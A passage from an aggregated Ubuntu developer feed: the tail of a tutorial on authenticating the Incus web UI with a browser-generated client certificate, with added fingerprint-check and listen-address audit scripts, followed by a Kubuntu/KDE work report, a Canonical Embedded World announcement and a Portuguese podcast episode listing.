<figure class="aligncenter size-full"><a href="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-3.png?ssl=1"><img alt="" class="wp-image-46767" height="446" src="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-3.png?resize=626%2C446&ssl=1" width="626" /></a></figure></div>
<p>At this point the browser has generated <code>incus-ui.crt</code>, which is the user certificate to install in Incus. In the following we add the user certificate to the Incus trust store.</p>
<pre class="wp-block-code"><code>debian@myincus:~$ <kbd>incus config trust list</kbd>
+------+------+-------------+-------------+-------------+
| NAME | TYPE | DESCRIPTION | FINGERPRINT | EXPIRY DATE |
+------+------+-------------+-------------+-------------+
debian@myincus:~$ <kbd>incus config trust add-certificate incus-ui.crt</kbd>
debian@myincus:~$ <kbd>incus config trust list</kbd>
+--------------+--------+-------------+--------------+----------------------+
| NAME | TYPE | DESCRIPTION | FINGERPRINT | EXPIRY DATE |
+--------------+--------+-------------+--------------+----------------------+
| incus-ui.crt | client | | b89b80eb4c89 | 2026/12/23 21:08 UTC |
+--------------+--------+-------------+--------------+----------------------+
debian@myincus:~$ </code></pre>
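<p>Before relying on the new trust entry, you can confirm that it really is the certificate your browser generated. The following is an added example, not part of the original post: it computes the SHA-256 fingerprint of the certificate (Incus fingerprints are the SHA-256 of the DER-encoded certificate, and the table shows the first 12 hex digits) and looks it up in the table printed by <code>incus config trust list</code>. The function names are hypothetical.</p>

```shell
#!/bin/sh
# Added example (not from the original post); function names are hypothetical.

# Print the SHA-256 fingerprint (lowercase hex) of the first certificate in a
# PEM file. A PEM body is the base64 of the DER encoding, so coreutils suffice.
# Fails if the file is unreadable or holds no certificate block.
cert_fingerprint() {
    body=$(awk '
        /-----BEGIN CERTIFICATE-----/ { inside = 1; next }
        /-----END CERTIFICATE-----/   { exit }
        inside { gsub(/[ \t\r]/, ""); printf "%s", $0 }
    ' "$1") || return 1
    [ -n "$body" ] || return 1
    printf '%s' "$body" | base64 -d | sha256sum | cut -d' ' -f1
}

# Read the table printed by `incus config trust list` on stdin and print the
# NAME of every entry whose (shortened) FINGERPRINT is a prefix of the
# fingerprint of the certificate file given as $1.
# Exit status: 0 = trusted, 1 = not in the trust store, 2 = unreadable file.
trusted_name_for() {
    full=$(cert_fingerprint "$1") || return 2
    awk -F'|' -v full="$full" '
        NF >= 6 {
            name = $2; fp = $5
            gsub(/^[ \t]+|[ \t]+$/, "", name)
            gsub(/^[ \t]+|[ \t]+$/, "", fp)
            # Header and border rows never match: fingerprints are lowercase hex.
            if (fp ~ /^[0-9a-f]+$/ && index(full, fp) == 1) {
                print name
                found = 1
            }
        }
        END { exit (found ? 0 : 1) }
    '
}

# Usage on the Incus host, with the file the browser generated:
#   incus config trust list | trusted_name_for incus-ui.crt
```

<p>The same lookup works for the certificate inside <code>incus-ui.pem</code>, because only the first <code>BEGIN CERTIFICATE</code> block is hashed. An entry in the trust list that matches no certificate you hold is worth investigating.</p>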
<div class="wp-block-image">
<figure class="aligncenter size-large"><a href="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-4.png?ssl=1"><img alt="" class="wp-image-46768" height="641" src="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-4.png?resize=750%2C641&ssl=1" width="750" /></a>The two files have been generated. We are adding <code>incus-ui.crt</code> to Incus, and <code>incus-ui.pfx</code> to the Web browser. </figure></div>
<p>The page above has instructions on how to add the user certificate to Firefox, Chrome, Edge and macOS. For example, for the case of Firefox, type the following into the address bar and press Enter. Alternatively, go to Settings→Privacy & Security→Certificates. There, click on <strong><em>View Certificates…</em></strong> and select the <strong><em>Your Certificates</em></strong> tab. Finally, click on Import… and select the <code>incus-ui.pfx</code> certificate file.</p>
<pre class="wp-block-code"><code>about:preferences#privacy</code></pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-5.png?ssl=1"><img alt="" class="wp-image-46769" height="175" src="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-5.png?resize=750%2C175&ssl=1" width="750" /></a>This is found in Firefox under <strong><em>Settings</em></strong>→<strong><em>Privacy & Security</em></strong>→<strong><em>Certificates</em></strong>.</figure></div>
<p>When you add the <code>incus-ui.pfx</code> user certificate in Firefox, it will appear as in the following screenshot.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-6.png?ssl=1"><img alt="" class="wp-image-46770" height="482" src="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-6.png?resize=705%2C482&ssl=1" width="705" /></a>The <code>incus-ui.pfx</code> certificate has been added to this instance of Firefox.</figure></div>
<p>Subsequently, switch back to the Firefox tab with the Incus UI page and you are shown the following prompt to get your browser to send the user certificate to the Incus manager in order to get authenticated, and be able to manage Incus through the Web. Click on <strong><em>OK</em></strong>.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><a href="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-7.png?ssl=1"><img alt="" class="wp-image-46771" height="311" src="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-7.png?resize=750%2C311&ssl=1" width="750" /></a>You are prompted to identify yourself to Incus UI in order to be able to manage the Incus installation.</figure></div>
<p>Finally, you are able to manage Incus over the Web with Incus UI. The Web page loads up and you can perform all tasks that you can do with the <code>incus</code> command-line client.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-8.png?ssl=1"><img alt="" class="wp-image-46772" height="584" src="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-8.png?resize=750%2C584&ssl=1" width="750" /></a>Your browser is now authenticated through your user certificate and you can manage Incus over the Web with Incus UI.</figure></div>
<h2 class="wp-block-heading" id="using-the-incus-ui">Using the Incus UI</h2>
<p>We click on <strong><em>Create Instance</em></strong> to create a first instance. We select from the list which image to use, then click to <strong><em>Create and start</em></strong>.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><a href="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-9.png?ssl=1"><img alt="" class="wp-image-46774" height="454" src="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-9.png?resize=750%2C454&ssl=1" width="750" /></a>Creating an instance and starting it.</figure></div>
<p>While the instance is created, you are updated with the different steps that take place. In the end, the instance is successfully launched.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><a href="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/Screenshot-2024-03-28-at-23-52-55-10.10.10.98-Incus-UI.png?ssl=1"><img alt="" class="wp-image-46776" height="454" src="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/Screenshot-2024-03-28-at-23-52-55-10.10.10.98-Incus-UI.png?resize=750%2C454&ssl=1" width="750" /></a>The instance has been created and is running.</figure></div>
<h2 class="wp-block-heading" id="conclusion">Conclusion</h2>
<p>With Incus UI you are able to go through the whole workflow of managing Incus instances through your Web browser. Incus UI has been implemented as a stateless Web application, which means that no information is stored in the browser. For example, the browser does not maintain a database with the created instances; the state is maintained on Incus.</p>
<p>There are a few more UI Web applications for Incus, including <code><a href="https://github.com/melato/lxops">lxops</a></code>. At some point in the future I expect to cover them as well.</p>
<h2 class="wp-block-heading" id="tips-and-tricks">Tips and Tricks</h2>
<h3 class="wp-block-heading" id="how-to-make-the-incus-port-accessible-to-localhost-only">How to make the Incus port accessible to localhost only</h3>
<p>The address has the format of &lt;<em>ip address</em>&gt;:&lt;<em>port</em>&gt;. You can specify <em>localhost</em> (127.0.0.1) as the IP address part. By doing so, Incus will bind only to <em>localhost</em> and accept local connections only.</p>
<pre class="wp-block-code"><code>debian@myincus:~$ <kbd>incus config show</kbd>
config:
core.https_address: :8443
debian@myincus:~$ <kbd>incus config set core.https_address 127.0.0.1:8443</kbd>
debian@myincus:~$ <kbd>incus config show</kbd>
config:
core.https_address: 127.0.0.1:8443
debian@myincus:~$ <kbd>sudo lsof -i :8443</kbd>
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
incusd 8338 root 8u IPv4 30315 0t0 TCP localhost:8443 (LISTEN)
debian@myincus:~$ </code></pre>
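<p>The check above can be scripted. The following is an added example, not part of the original post: it reads the output of <code>incus config show</code> and reports whether <code>core.https_address</code> exposes the API on all interfaces, on loopback only, or on one specific address. The function names and the result labels are hypothetical.</p>

```shell
#!/bin/sh
# Added example (not from the original post); function names and the
# result labels are hypothetical.

# Extract the value of core.https_address from `incus config show` output
# read on stdin. Prints nothing when the key is not set.
https_address() {
    sed -n 's/^[[:space:]]*core\.https_address:[[:space:]]*//p' \
        | head -n 1 | tr -d "\"'"
}

# Classify a listen address of the form <ip address>:<port>.
# An empty host part (":8443") binds to every interface, which is easy to
# miss when reading the configuration.
classify_listen_address() {
    addr=$1
    if [ -z "$addr" ]; then
        echo "not-listening"
        return 0
    fi
    case $addr in
        \[*\]:*) host=${addr%%\]*}; host=${host#\[} ;;  # [IPv6]:port
        \[*\])   host=${addr#\[};   host=${host%\]} ;;  # [IPv6] without a port
        *:*:*)   host=$addr ;;                          # bare IPv6, no port
        *:*)     host=${addr%:*} ;;                     # IPv4 or name with port
        *)       host=$addr ;;                          # host without a port
    esac
    case $host in
        ""|"*"|0.0.0.0|::|0:0:0:0:0:0:0:0) echo "all-interfaces" ;;
        localhost|127.*|::1)               echo "loopback-only" ;;
        *)                                 echo "specific-address" ;;
    esac
}

# Read `incus config show` output on stdin and print the classification.
audit_incus_listener() {
    classify_listen_address "$(https_address)"
}

# Usage on the Incus host:
#   incus config show | audit_incus_listener
```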
<h3 class="wp-block-heading" id="whats-in-incusuicrt-and-incusuipfx">What’s in <code>incus-ui.crt</code> and <code>incus-ui.pfx</code>?</h3>
<p>You can use <code>openssl</code> to decode both files. This is an RSA 2048-bit certificate using the SHA-1 hash function.</p>
<pre class="wp-block-code"><code>$ <kbd>openssl x509 -in incus-ui.crt -noout -text</kbd>
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
01:12:00:11:07:65:00:03:00:10:00:41:00:04:09:11
Signature Algorithm: sha1WithRSAEncryption
Issuer: C = AU, ST = Some-State, O = Incus UI 10.10.10.98 (Browser Generated)
Validity
Not Before: Mar 28 21:08:58 2024 GMT
Not After : Dec 23 21:08:58 2026 GMT
Subject: C = AU, ST = Some-State, O = Incus UI 10.10.10.98 (Browser Generated)
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
00:ce:f8:1d:67:e1:a3:f5:1a:16:b6:26:63:8f:32:
42:99:0d:af:86:8b:18:49:1a:4b:8e:ab:68:e1:04:
ba:24:dd:e6:27:d5:df:7a:13:cf:16:b3:33:28:89:
e0:ab:c8:dc:c1:2a:0a:de:ed:26:3a:77:74:dd:42:
1c:e2:22:fc:a5:a5:68:c1:c9:3b:4d:12:15:27:ae:
c6:50:ec:dc:f1:0a:ba:00:0c:83:d0:0d:0f:81:90:
4e:30:43:cb:45:bf:e2:e9:17:39:40:3b:95:8b:8b:
18:e9:59:51:fc:9a:7a:80:e4:73:b3:54:bd:ff:1c:
7c:81:75:16:e3:6f:3a:56:9b:0f:a3:73:55:45:03:
d8:fb:f3:34:4c:60:4f:f2:67:9f:66:ea:29:29:78:
6c:66:05:d6:7d:96:cd:0f:2b:4b:9c:71:2c:09:6f:
e2:b4:23:d0:5d:d0:fe:b0:6a:b1:58:5e:d7:b5:47:
9e:aa:47:34:f8:7d:e1:ed:fe:bf:97:3d:99:49:42:
af:e2:e5:b3:c5:1e:58:b1:98:01:db:8f:25:9f:f8:
d9:03:02:06:f9:99:0a:3a:a1:70:9d:fe:64:0d:c2:
d8:cc:f0:1c:53:e4:31:4c:78:12:c2:fd:72:23:6a:
f4:7e:41:f9:d5:df:6b:ad:2c:52:29:d0:7f:eb:65:
64:0f
Exponent: 65537 (0x10001)
Signature Algorithm: sha1WithRSAEncryption
Signature Value:
28:b3:5c:48:64:8c:23:82:dd:e2:05:6a:9d:18:dd:43:f4:07:
e6:be:1e:80:b7:f9:0c:0f:3d:cd:b8:bd:7b:55:7e:36:6d:74:
24:d5:69:b2:24:51:3a:2d:c5:95:68:b5:dc:27:d5:83:d9:bc:
cb:d0:fd:55:24:63:7d:c6:65:9b:f1:b3:9d:f7:b4:4e:ba:83:
eb:bf:f5:d0:f6:95:2d:7b:90:4e:d3:89:ac:f0:87:e6:fa:9d:
f6:ea:c2:42:f2:15:17:74:5c:e4:3c:ed:1a:42:3c:e7:04:aa:
65:42:3e:75:5c:24:8e:52:85:0d:4b:b2:e2:ec:fa:57:4a:68:
35:4b:8f:3c:13:fc:15:09:80:5a:b1:c8:e0:22:f5:69:25:4b:
46:8b:e0:b9:e1:3a:f5:0c:40:d2:c3:75:9c:79:9a:aa:68:9b:
21:36:ed:67:cb:6d:fc:bc:f0:0b:5a:2b:1a:4c:73:67:c5:79:
b6:27:b9:58:d0:c7:ea:84:21:bf:f4:7c:44:11:d7:88:ab:1d:
e4:53:c9:10:cd:e6:b8:5a:7a:92:73:a8:1e:fe:1c:2e:dc:e8:
7e:3d:e9:a2:6d:26:5a:09:40:a1:3e:51:40:8b:da:57:37:9a:
8d:0e:d8:cf:c1:0a:b1:0b:95:53:05:41:29:39:af:93:9b:aa:
10:af:a1:6c
$ </code></pre>
<p>For the <code>incus-ui.pfx</code> file, we first convert to the PEM format, then print the contents. The PFX file contains the certificate (the same that was added earlier to Incus) along with the private key.</p>
<pre class="wp-block-code"><code>$ <kbd>openssl pkcs12 -in incus-ui.pfx -out incus-ui.pem -noenc</kbd>
Enter Import Password:
$ <kbd>cat incus-ui.pem </kbd>
Bag Attributes
localKeyID: 3A 23 25 F7 56 4D 71 B8 FB FD 72 90 2D A1 F3 B8 2F 01 5E 92
friendlyName: Incus-UI
subject=C = AU, ST = Some-State, O = Incus UI 10.10.10.98 (Browser Generated)
issuer=C = AU, ST = Some-State, O = Incus UI 10.10.10.98 (Browser Generated)
-----BEGIN CERTIFICATE-----
...
-----END CERTIFICATE-----
Bag Attributes
localKeyID: 3A 23 25 F7 56 4D 71 B8 FB FD 72 90 2D A1 F3 B8 2F 01 5E 92
friendlyName: Incus-UI
Key Attributes: <No Attributes>
-----BEGIN PRIVATE KEY-----
...
-----END PRIVATE KEY-----
$ </code></pre>
<h2 class="wp-block-heading" id="troubleshooting">Troubleshooting</h2>
<h3 class="wp-block-heading" id="error-unable-to-connect">Error: Unable to connect</h3>
<p>You tried to access the IP address of the Incus server as (for example) <code>https://192.168.1.10/</code> while you should have specified the port number as well. The URL should look like <code>https://192.168.1.10:8443/</code>.</p>
<h3 class="wp-block-heading" id="error-client-sent-an-http-request-to-an-https-server">Error: Client sent an HTTP request to an HTTPS server</h3>
<p>You tried to connect to the Incus server at an address (for example) <code>http://192.168.1.10:8443/</code> but you omitted the <code>s</code> in <code>https</code>. Use <code>https://192.168.1.10:8443/</code> instead. </p>
<h3 class="wp-block-heading" id="warning-potential-security-risk-ahead">Warning: Potential Security Risk Ahead</h3>
<p>You are accessing the Incus server through the HTTPS address for the first time and the certificate has not been signed by a certification authority. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image.png?ssl=1"><img alt="" class="wp-image-46761" height="540" src="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image.png?resize=750%2C540&ssl=1" width="750" /></a>First attempt to access the Incus server over HTTPS with your browser.</figure></div>
<p>Click on <em>Advanced</em> and select to <em>Accept the risk and Continue</em>. If you want to avoid this error message, you need to provide a server certificate that is accepted by your browser. </p>
<div class="saboxplugin-wrap"><div class="saboxplugin-tab"><div class="saboxplugin-gravatar"><img alt="Simos Xenitellis" class="avatar avatar-100 photo" height="100" src="https://secure.gravatar.com/avatar/5c04c6b5f513d926ea9d77782a3843a1?s=100&d=wavatar&r=g" width="100" /></div><div class="saboxplugin-authorname"><a class="vcard author" href="https://blog.simos.info/author/simos/" rel="author"><span class="fn">Simos Xenitellis</span></a></div><div class="saboxplugin-desc"><div></div></div><div class="saboxplugin-web "><a href="https://blog.simos.info/" target="_self">blog.simos.info/</a></div><div class="clearfix"></div></div></div>Ubuntu developershttp://planet.ubuntu.com/Purism Differentiator Series, Part 8: Big Tech Avoidancehttps://puri.sm/?p=811832024-03-28T18:14:24+00:00<p>Welcome to Purism, a different type of technology company. We believe you should have technology that does not spy on you. We believe you should have complete control over your digital life. We advocate for personal privacy, cyber security, and individual freedoms. We sell hardware, develop software, and provide services according to these beliefs. To […]</p>
<p>The post <a href="https://puri.sm/posts/purism-differentiator-series-part-8-big-tech-avoidance/" rel="nofollow">Purism Differentiator Series, Part 8: Big Tech Avoidance</a> appeared first on <a href="https://puri.sm/" rel="nofollow">Purism</a>.</p>Todd Weaverhttps://puri.sm/Scarlett Gately Moore: Kubuntu, KDE Report. In Loving Memory of my Son.https://www.scarlettgatelymoore.dev/?p=4312024-03-28T17:54:44+00:00<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">
</div></figure>
<p><strong>Personal:</strong></p>
<p>As many of you know, I lost my beloved son March 9th. This has hit me really hard, but I am staying strong and holding on to all the wonderful memories I have. He grew up to be an amazing man, devoted Christian and wonderful father. He was loved by everyone who knew him and will be truly missed by us all. I have had folks ask me how they can help. He left behind his 7 year old son Mason. Mason was Billy’s world and I would like to make sure Mason is taken care of. I have set up a gofundme for Mason and all proceeds will go to the future care of him. </p>
<p><a href="https://gofund.me/25dbff0c">https://gofund.me/25dbff0c</a></p>
<p class="has-text-align-center"><strong>Work report</strong></p>
<p><strong>Kubuntu:</strong></p>
<p>Bug bashing! I am triaging allthebugs for Plasma which can be seen here:</p>
<p><a href="https://bugs.launchpad.net/plasma-5.27/+bug/2053125">https://bugs.launchpad.net/plasma-5.27/+bug/2053125</a></p>
<p>I am happy to report many of the remaining bugs have been fixed in the latest bug fix release 5.27.11.</p>
<p>I prepared <a href="https://kde.org/announcements/plasma/5/5.27.11/">https://kde.org/announcements/plasma/5/5.27.11/</a> and Rik uploaded to archive, thank you. Unfortunately, this and several other key fixes are stuck in transition due to the time_t64 transition, which you can read about here: <a href="https://wiki.debian.org/ReleaseGoals/64bit-time">https://wiki.debian.org/ReleaseGoals/64bit-time</a> . It is the biggest transition in Debian/Ubuntu history and it couldn’t come at a worse time. We are aware our ISO installer is currently broken, calamares is one of those things stuck in this transition. There is a workaround in the comments of the bug report: <a href="https://bugs.launchpad.net/ubuntu/+source/calamares/+bug/2054795">https://bugs.launchpad.net/ubuntu/+source/calamares/+bug/2054795</a></p>
<p>Fixed an issue with plasma-welcome.</p>
<p>Found the fix for emojis and Aaron has kindly moved this forward with the fontconfig maintainer. Thanks!</p>
<p>I have received an <a href="https://kfocus.org/spec/spec-ir14.html">https://kfocus.org/spec/spec-ir14.html</a> laptop and it is truly a great machine and is now my daily driver. A big thank you to the Kfocus team! I can’t wait to show it off at <a href="https://linuxfestnorthwest.org/">https://linuxfestnorthwest.org/</a>.</p>
<p><strong>KDE Snaps:</strong></p>
<p>You will see the activity in this ramp back up as the KDEneon Core project is finally a go! I will participate in the project with part time status and get everyone in the Enokia team up to speed with my snap knowledge, help prepare the qt6/kf6 transition, package plasma, and most importantly I will focus on documentation for future contributors.</p>
<p>I have created the (now split) qt6 with KDE patchset support and KDE frameworks 6 SDK and runtime snaps. I have made the kde-neon-6 extension and the PR is in: https://github.com/canonical/snapcraft/pull/4698 . Future work on the extension will include multiple versions track support and core24 support.</p>
<figure class="wp-block-image size-large"><img alt="" class="has-transparency wp-image-433" height="712" src="https://www.scarlettgatelymoore.dev/wp-content/uploads/ark_qt6_snap-1024x712.png" width="1024" /></figure>
<p>I have successfully created our first qt6/kf6 snap ark. They will be showing up in the store once all the required bits have been merged and published.</p>
<p>Thank you for stopping by.</p>
<p>~Scarlett</p>Ubuntu developershttp://planet.ubuntu.com/Ubuntu Blog: Meet Canonical at Embedded World 2024https://ubuntu.com//blog/meet-canonical-at-embedded-world-20242024-03-28T17:07:16+00:00<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" height="628" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1200,h_628/https://ubuntu.com/wp-content/uploads/cd1f/image-2.png" width="1200" />
</noscript>
</div>
</figure>
<p><a href="https://www.embedded-world.de/en">Embedded World</a> is almost here. With 930+ exhibitors, 200 nonstop hours of knowledge sharing, and an exciting <a href="https://www.embedded-world.de/en/conferences-programme/programme-overview">programme</a> structured along 9 tracks with 60+ sessions and 18 classes, Embedded World is the must-attend global event for the embedded community.</p>
<p>Join us at Booth 4-354 in Hall 4 to find out how Canonical, the publisher of Ubuntu, can support your technology stack from cloud to device with unrivalled security. Meet the Canonical team on-site to pick our technical experts’ brains about your embedded Linux business. </p>
<p> <a class="p-button--small p-button--positive" href="https://calendly.com/canonical-embedded-world-2024/embedded-world-live-demo" rel="noreferrer noopener" target="_blank">Book a meeting with our experts</a></p>
<h1 class="wp-block-heading">Raising the bar for embedded Linux with Ubuntu Core 24</h1>
<p>At Canonical we are committed to supporting device manufacturers and IoT pioneers across their deployment journeys by providing a best-in-class experience for embedded Linux in production with Ubuntu Core. </p>
<p>Building on 20 years of innovation within Canonical, Ubuntu Core is a proven embedded Linux OS for Internet of Things (IoT), devices and edge systems. At Embedded World, you’ll connect with manufacturers engaging in large-scale, mass-deployments of Linux boards. Those innovators are pushing the envelope of digital infrastructure with the help of <a href="https://ubuntu.com/core">Ubuntu Core</a>, the most popular Linux-based operating system (OS) purposefully designed for the embedded world. By relying on an enterprise-grade Linux distribution supported over 10+ years, they empower their enterprise customers to focus on what drives their business, shortening time-to-market.</p>
<p>Meet our experts at Booth 4-354 in Hall 4 to learn about Ubuntu Core 24, see industry demos, and hear customer stories about running Ubuntu Core. In this release, Core 24 leaps forward in production build and installation, fleet management, graphics operations and cloud integration. </p>
<h1 class="wp-block-heading">What to expect at our booth</h1>
<p>At Embedded World, we will also showcase how we are setting the stage for the future of digitisation in manufacturing and accelerating industrial transformation. We’re eagerly looking forward to presenting our automotive and IoT offerings, showing you how you can integrate security into your technology stack from cloud to device. </p>
<p>In our booth you’ll find demos spotlighting how our customers and partners are using Ubuntu in their devices. Read more about our demos below:</p>
<h2 class="wp-block-heading">Meet the Husarion Panther </h2>
<p>Since its inception in 2013, <a href="https://husarion.com/">Husarion</a> has been pioneering the commercialization of ROS in the robotics industry. As an autonomous mobile robot (AMR) manufacturer and innovator, Husarion’s commitment lies in making robotics efficient and accessible for all.</p>
<p><a href="https://store.husarion.com/products/panther">Panther</a> is Husarion’s new professional-grade AMR. Engineered for robustness, with independent BLDC motors for each of its four wheels, Panther is a testament to adaptability – flourishing in diverse landscapes from agriculture to construction.</p>
<p>With their decision to use Ubuntu Core, Husarion has upgraded their software deployment for AMR. Snaps provide a solution for consistent software deployment on robots, by bundling ROS applications with their necessary dependencies.</p>
<p> <a class="p-button--small p-button--positive" href="https://calendly.com/canonical-embedded-world-2024/embedded-world-live-demo" rel="noreferrer noopener" target="_blank">Book a demo with the Husarion team to learn more</a></p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" height="472" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1288,h_472/https://ubuntu.com/wp-content/uploads/fbd8/image-1.png" width="1288" />
</noscript>
</div>
</figure>
<h2 class="wp-block-heading">Discover EV charging infrastructure with DFI</h2>
<p>Together with our partners DFI we are presenting our EV charging station solution. DFI is a global leading provider of high-performance computing technology across multiple embedded industries. With its innovative design and premium quality management system, DFI’s industrial-grade solutions enable customers to optimize their equipment and ensure high reliability, long-term life cycle, and 24/7 durability in a breadth of markets including factory automation, medical, gaming, transportation, smart energy, mission-critical, and intelligent retail.</p>
<p>Their EV charging solution is based on x86 architecture, running on Intel’s Virtualization of Graphic Card (SR-IOV) and Intel Neural Mistral 7B AI model, leveraging advanced connectivity (TSN) and Out-Of-Band Management from the Intel technologies. </p>
<p> <a class="p-button--small p-button--positive" href="https://calendly.com/canonical-embedded-world-2024/embedded-world-live-demo" rel="noreferrer noopener" target="_blank">Book a demo to learn more</a></p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" height="900" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1600,h_900/https://ubuntu.com/wp-content/uploads/6d85/image.png" width="1600" />
</noscript>
</div>
</figure>
<h2 class="wp-block-heading">Introducing security devices from Bosch</h2>
<p>At our booth you will find the <a href="https://www.bosch-smarthome.com/uk/en/products/devices/eyes-outdoor-camera-ii/">Bosch Eyes indoor and outdoor security cameras</a>. Part of the Bosch Smart Home ecosystem, these cameras marry award-winning design with technical excellence built with security in mind using Ubuntu Core. </p>
<p>The second generation Bosch Eyes Outdoor camera comes with person detection, real-time notifications and an integrated alarm system. Its DualRadar technology with two cutting-edge radar sensors enables the camera to detect movements with an exceptionally wide 180° detection range. It can also determine exactly how far away the suspicious movement occurred as well as the exact direction – for twice the security.</p>
<p> <a class="p-button--small p-button--positive" href="https://calendly.com/canonical-embedded-world-2024/embedded-world-live-demo" rel="noreferrer noopener" target="_blank">Book a demo to find out more</a></p>
<h1 class="wp-block-heading">Experience innovation first-hand</h1>
<p>At this year’s Embedded World we are showcasing our world-leading ecosystem of partners. Canonical partners with silicon vendors, board manufacturers and ODMs to shorten enterprises’ time-to-market. At the Canonical booth you will find demo boards which are optimised/certified on Ubuntu from AMD, Ampere, Intel, MediaTek, NVIDIA, Qualcomm, Advantech, Aaeon, Adlink, DFI, IEI, ASRock, and Eurotech. Come and ask us about certified hardware at our booth or our partners’ booths!</p>
<h2 class="wp-block-heading">Ubuntu Core – the operating system for embedded devices</h2>
<p>Our devices field engineering team will be showcasing a set of applications running on Ubuntu Core.</p>
<p>These demos run on multiple platforms which are all enabled and optimised for Ubuntu Core, such as Intel NUC, MediaTek Genio1200, AMD Kria KV260, Raspberry Pi and even the RISC-V SiFive board.</p>
<p>The demos will showcase some of Ubuntu Core’s key features including over-the-air (OTA) updates, secure boot and full disk encryption. We’ll also demonstrate how you might use Ubuntu Core as your operating system for smart home, robotics and automotive devices.</p>
<h1 class="wp-block-heading">Let’s keep in touch </h1>
<p>Your learning journey doesn’t end at Embedded World. Discover more about defining your software stack for embedded devices in our latest whitepaper.</p>
<figure class="wp-block-image"><a href="https://ubuntu.com/engage/software-defined-iot">
<div class="lazyload">
<noscript>
<img alt="" height="200" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_600,h_200/https://ubuntu.com/wp-content/uploads/a638/image.png" width="600" />
</noscript>
</div>
</a></figure>
<p>Which embedded Linux distribution should you choose? In this <a href="https://ubuntu.com/engage/embedded-linux-yocto-ubuntu-core-whitepaper">whitepaper</a>, we discuss how Yocto and Ubuntu Core solve the most pressing challenges facing any developer working on an embedded device: board bring-up, maintenance, updates, security, and many more to help you decide whether you should make or buy your operating system.</p>Ubuntu developershttp://planet.ubuntu.com/Podcast Ubuntu Portugal: E292 O Nabo Da Casahttps://media.blubrry.com/ubuntupt/archive.org/download/pup-e292/e292.mp32024-03-28T00:00:00+00:00<p>What happens when an immovable positive growth <em>mindset</em> collides with Firefox updates in motion? Are aliens responsible for building the pyramids, playing tricks on UTF-16 characters or switching off optimisations on phones? Can you split a snap in two without sending shards flying? Will we have to go back to classic paper pocket diaries, or is FLOSS technology here to help us? Is the expression "<em>having too many Raspberry Pis</em>" myth or reality? Could using and trafficking drugs be an alternative career to getting into trouble with <em>software</em>? We are not sure we have answers to these questions…</p>
<p>You know the drill: listen, subscribe and share!</p>
<ul>
<li>
<p><a href="https://lovelynightowl.com">https://lovelynightowl.com</a></p>
</li>
<li>
<p><a href="https://mauser.pt/catalog/index.php?cPath=1667_2620_1672">https://mauser.pt/catalog/index.php?cPath=1667_2620_1672</a></p>
</li>
<li>
<p><a href="https://www.youtube.com/watch?v=5QczdJrkamQ">https://www.youtube.com/watch?v=5QczdJrkamQ</a></p>
</li>
<li>
<p><a href="https://www.twitch.tv/dmconstantino">https://www.twitch.tv/dmconstantino</a></p>
</li>
<li>
<p><a href="https://wikimedia.pt/eventos/wikicon-portugal-2024">https://wikimedia.pt/eventos/wikicon-portugal-2024</a></p>
</li>
<li>
<p><a href="https://drupaliberia.eu">https://drupaliberia.eu</a></p>
</li>
<li>
<p><a href="https://lisbon.globalappsec.org">https://lisbon.globalappsec.org</a></p>
</li>
<li>
<p><a href="https://discourse.ubuntu.com/t/call-for-volunteers-ubucon-north-america-2024/41470">https://discourse.ubuntu.com/t/call-for-volunteers-ubucon-north-america-2024/41470</a></p>
</li>
<li>
<p><a href="https://loco.ubuntu.com/teams/ubuntu-pt/">https://loco.ubuntu.com/teams/ubuntu-pt/</a></p>
</li>
<li>
<p><a href="https://shop.nitrokey.com/shop?aff_ref=3">https://shop.nitrokey.com/shop?aff_ref=3</a></p>
</li>
<li>
<p><a href="https://masto.pt/@pup">https://masto.pt/@pup</a></p>
</li>
<li>
<p><a href="https://youtube.com/PodcastUbuntuPortugal">https://youtube.com/PodcastUbuntuPortugal</a></p>
</li>
</ul>
<h3 id="apoios">Support</h3>
<p>You can support the podcast by using the Humble Bundle affiliate links, because when you use those links to make a purchase, part of what you pay goes to Podcast Ubuntu Portugal.
And you can get all of that for 15 dollars, or different parts of it depending on whether you pay 1 or 8.
We think this is worth much more than 15 dollars, so if you can, pay a little more, since you have the option to pay as much as you like.
